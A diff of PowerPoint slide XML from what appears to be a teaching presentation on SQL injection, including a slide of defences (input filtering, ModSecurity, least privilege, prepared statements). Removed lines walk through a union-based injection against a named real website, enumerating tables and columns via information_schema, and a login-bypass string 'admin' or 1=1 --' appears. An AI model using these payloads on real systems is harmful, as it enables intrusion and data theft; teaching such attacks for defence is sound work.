-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                 <a:solidFill>
                   <a:schemeClr val="tx1"/>
                 </a:solidFill>
@@ -4412,56 +4086,57 @@
                 <a:ea typeface="+mn-ea"/>
                 <a:cs typeface="+mn-cs"/>
               </a:rPr>
-              <a:t>Login normal: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>quangsonpro, langtutuoiteen</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClrTx/>
-              <a:buSzTx/>
-              <a:buFontTx/>
-              <a:buNone/>
-              <a:tabLst/>
-              <a:defRPr/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" i="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Login hacked: admin’ or 1=1</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="0" baseline="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t> --</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" i="0" dirty="0" smtClean="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
+              <a:t>CAST(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>[long hex string] </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>AS</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>VARCHAR(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>8000</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>));</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -4492,7 +4167,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1442560568"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1416644722"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -4543,26 +4218,11 @@
         </p:nvSpPr>
         <p:spPr/>
         <p:txBody>
-          <a:bodyPr/>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClrTx/>
-              <a:buSzTx/>
-              <a:buFontTx/>
-              <a:buNone/>
-              <a:tabLst/>
-              <a:defRPr/>
-            </a:pPr>
             <a:r>
               <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                 <a:solidFill>
@@ -4573,16 +4233,266 @@
                 <a:ea typeface="+mn-ea"/>
                 <a:cs typeface="+mn-cs"/>
               </a:rPr>
-              <a:t>Login normal: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>quangsonpro, langtutuoiteen</a:t>
-            </a:r>
+              <a:t>1. </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>Comprehensive data sanitization</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>. Web sites must filter </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="1" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>all</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t> user input. Ideally, user data should be filtered for context. For example, e-mail addresses should be filtered to allow only the characters allowed in an e-mail address, phone numbers should be filtered to allow only the characters allowed in a phone number, and so on.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>2. </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>Use a web application firewall</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>. A popular example is the free, open source module </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>ModSecurity</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t> which is available for Apache, Microsoft IIS, and </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>nginx</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t> web servers. ModSecurity provides a sophisticated and ever-evolving set of rules to filter potentially dangerous web requests. Its SQL injection defenses can catch most attempts to sneak SQL through web channels.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>3. </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>Limit database privileges by context</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>. Create multiple database user accounts with the minimum levels of privilege for their usage environment. For example, the code behind a login page should query the database using an account limited only to the </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>relevent</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t> credentials table. This way, a breach through this channel cannot be leveraged to compromise the entire database.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>4. </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>Avoid constructing SQL queries with user input</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="1" i="1" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>. </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>Even data sanitization routines can be flawed. Ideally, using SQL variable binding with prepared statements or stored procedures is much safer than constructing full queries.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+              <a:effectLst/>
+              <a:latin typeface="+mn-lt"/>
+              <a:ea typeface="+mn-ea"/>
+              <a:cs typeface="+mn-cs"/>
+            </a:endParaRPr>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -4613,7 +4523,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2368136216"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2167241784"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -4685,44 +4595,24 @@
               <a:defRPr/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>1. </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>inurl</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>=.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>php?id</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>=</a:t>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>Login normal: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>quangsonpro, langtutuoiteen</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -4744,454 +4634,146 @@
               <a:defRPr/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>http://www.raahauges.com/view-news.php?id=8</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClrTx/>
-              <a:buSzTx/>
-              <a:buFontTx/>
-              <a:buNone/>
-              <a:tabLst/>
-              <a:defRPr/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>2. http://www.raahauges.com/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>view-news.php?id</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>=‘</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClrTx/>
-              <a:buSzTx/>
-              <a:buFontTx/>
-              <a:buNone/>
-              <a:tabLst/>
-              <a:defRPr/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>3. http://www.raahauges.com/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>view-news.php?id</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>=‘</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClrTx/>
-              <a:buSzTx/>
-              <a:buFontTx/>
-              <a:buNone/>
-              <a:tabLst/>
-              <a:defRPr/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>4. http://www.raahauges.com/view-news.php?id=8</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>order</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>by</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>5</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
+              <a:rPr lang="en-US" i="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Login hacked: admin’ or 1=1</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="0" baseline="0" dirty="0" smtClean="0">
                 <a:solidFill>
                   <a:schemeClr val="tx1"/>
                 </a:solidFill>
               </a:rPr>
               <a:t> --</a:t>
             </a:r>
-            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
+            <a:endParaRPr lang="en-US" i="0" dirty="0" smtClean="0">
               <a:solidFill>
                 <a:schemeClr val="tx1"/>
               </a:solidFill>
             </a:endParaRPr>
           </a:p>
           <a:p>
-            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClrTx/>
-              <a:buSzTx/>
-              <a:buFontTx/>
-              <a:buNone/>
-              <a:tabLst/>
-              <a:defRPr/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>5. http://www.raahauges.com/view-news.php?id=null</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t> union all select 1,2,3,4,5 -- </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClrTx/>
-              <a:buSzTx/>
-              <a:buFontTx/>
-              <a:buNone/>
-              <a:tabLst/>
-              <a:defRPr/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>6. http://www.raahauges.com/view-news.php?id=null union all select 1,2,group_concat(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" err="1" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>table_name</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>),4,5 from </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" err="1" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>information_schema.tables</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t> where </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" err="1" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>table_schema</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>=database() --</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClrTx/>
-              <a:buSzTx/>
-              <a:buFontTx/>
-              <a:buNone/>
-              <a:tabLst/>
-              <a:defRPr/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>7. </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>http://www.raahauges.com/view-news.php?id=null union all select 1,2,group_concat(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" err="1" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>column_name</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>),4,5 from </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" err="1" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>information_schema.columns</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t> where </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" err="1" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>table_schema</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>=database() –</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
